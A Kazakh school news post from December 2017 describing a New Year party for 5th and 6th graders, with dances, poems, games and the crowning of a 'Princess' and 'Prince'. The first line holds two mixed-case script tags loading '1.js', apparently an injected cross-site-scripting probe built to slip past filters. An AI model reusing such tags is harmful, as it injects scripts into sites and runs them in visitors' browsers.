<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.12.2017

Жаңа жыл – әлемдегі қуанышқа толы ең ғажайып мерекелердің бірі. Жаңа жыл – жаңару, даму, ілгерілеу. Жаңа жыл – өткенге салауат айтып, болашақтан үміт күту.  

Тағы бір жыл артта қалып, төрімізге Жаңа жыл келмек. Санаулы күндерден кейін ескі жылмен есептесіп, Жаңа жылды құшақ жая қарсы аламыз. 

 Біздің мектептің оқушылары да келе жатқан жаңа жылдан жарқын ертегі, жаңа бақыт күтеді. Мектептің 5-6 сынып оқушыларына арналған жаңа жылдық бағдарлама әзірленді.  Кешімізді би әуенімен тербелетіп, 5,6 сынып оқушылары вальс биледі.

5,6 сынып оқушылары Жаңа жылға арналған тақпақтар, өлеңдер. Аяз атаға айтып, тәтті сыйлықтар алды. Оқушылар «Қара жорға», «Грузин» биі, «Шығыс» биі, «Ча-ЧА-ЧА» биін биледі. Түрлі ойындар ойнатылды. Оқушылар билерге де, ойындарға да белсене қатысты.

Мереке соңында балаларға сиқырлы сандықшадан жұлдыздар таратылды. Оқушылар жұлдызшаларды ең әдемі, ең өнерлі қыз бен ер балаға тағу керек болды. Жаңа жыл балында жұлдызшаны ең көп жинаған Ахмет Камила - Ханшайым және Ерік Мерейхан - Жаңа жыл Ханзадасы аталды. Ханшайым мен Ханзада оқушыларға өз тілектері мен құттықтауларын айтты.

Просмотров: 516


Пікір қосу



Деректерді қолтаңбаға қосу